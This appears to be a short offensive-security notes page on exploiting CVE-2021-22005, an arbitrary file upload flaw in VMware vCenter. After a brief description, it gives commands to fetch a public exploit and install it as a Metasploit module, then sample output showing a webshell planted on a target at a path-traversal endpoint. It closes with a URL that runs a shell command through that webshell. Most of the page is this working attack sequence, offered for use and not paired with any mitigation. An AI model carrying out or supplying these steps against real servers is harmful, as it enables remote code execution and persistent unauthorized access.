VMware vCenter file upload (CVE-2021-22005)

The vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file.

The following exploit will use a simple exploit to upload a webshell to the vCenter instance:

GitHub - tiagob0b/CVE-2021-22005GitHub

git clone https://github.com/TaroballzChen/CVE-2021-22005-metasploit
cd CVE-2021-22005-metasploit
mkdir -p ~/.msf4/modules/auxiliary/scanner/http
cp vmware_vcenter_server_file_upload_to_rce.py ~/.msf4/modules/auxiliary/scanner/http/
chmod +x ~/.msf4/modules/auxiliary/scanner/http/vmware_vcenter_server_file_upload_to_rce.py

After running it with MSF:

[+] the target https://192.168.120.32:443 could be vulnerable by CVE-2021-22005
[+] Webshell Endpoint: https://192.168.120.32:443/idm/..;/isxhcf.jsp
[+] Webshell Parameter: 71dkzc

Can now access the webshell:

https://192.168.120.32/idm/..;/isxhcf.jsp?71dkzc=ls

Last updated 1 year ago